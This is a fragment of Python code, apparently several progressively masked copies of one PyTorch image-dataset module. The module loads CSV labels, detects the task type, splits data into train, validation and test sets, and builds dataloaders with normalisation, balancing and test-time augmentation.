test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in 
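The __getitem__ above balances classes by raising the probability of the extra transforms for minority samples. A common alternative with the same goal is to oversample minorities at the loader level; a sketch using torch's WeightedRandomSampler, where labels is assumed to be the list of integer class ids for the dataset:

import numpy as np
import torch
from torch.utils.data import DataLoader, WeightedRandomSampler

def balanced_loader(dataset, labels, bs=32):
    labels = np.asarray(labels)
    weights = 1.0 / np.bincount(labels)[labels]  # rarer class -> larger weight
    sampler = WeightedRandomSampler(torch.as_tensor(weights, dtype=torch.double),
                                    num_samples=len(labels), replacement=True)
    return DataLoader(dataset, batch_size=bs, sampler=sampler)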
zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n 
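split_df() is not shown in this excerpt; from its call sites (train_df, val_df = split_df(train_df, split_size)) it returns a (larger, smaller) pair of frames. A minimal stand-in consistent with that usage:

def split_df(df, split_size=0.15):
    # hold out split_size of the rows; a fixed seed keeps splits reproducible
    held_out = df.sample(frac=split_size, random_state=2)
    rest = df.drop(held_out.index).reset_index(drop=True)
    return rest, held_out.reset_index(drop=True)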
self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = 
get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n<class token>\n\n\nclass my_image_folder(DatasetFolder):\n <function token>\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n 
print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, 
self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, 
multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return 
image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n<class token>\n\n\nclass my_image_folder(DatasetFolder):\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if 
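denorm_img above inverts Normalize with inp = std * inp + mean before clipping to [0, 1]. The same algebra on a CHW tensor, checked round-trip:

import torch
from torchvision import transforms

mean, std = [0.485, 0.456, 0.406], [0.229, 0.224, 0.225]
img = torch.rand(3, 8, 8)
norm = transforms.Normalize(mean, std)(img)
restored = norm * torch.tensor(std)[:, None, None] + torch.tensor(mean)[:, None, None]
assert torch.allclose(restored, img, atol=1e-6)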
self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or 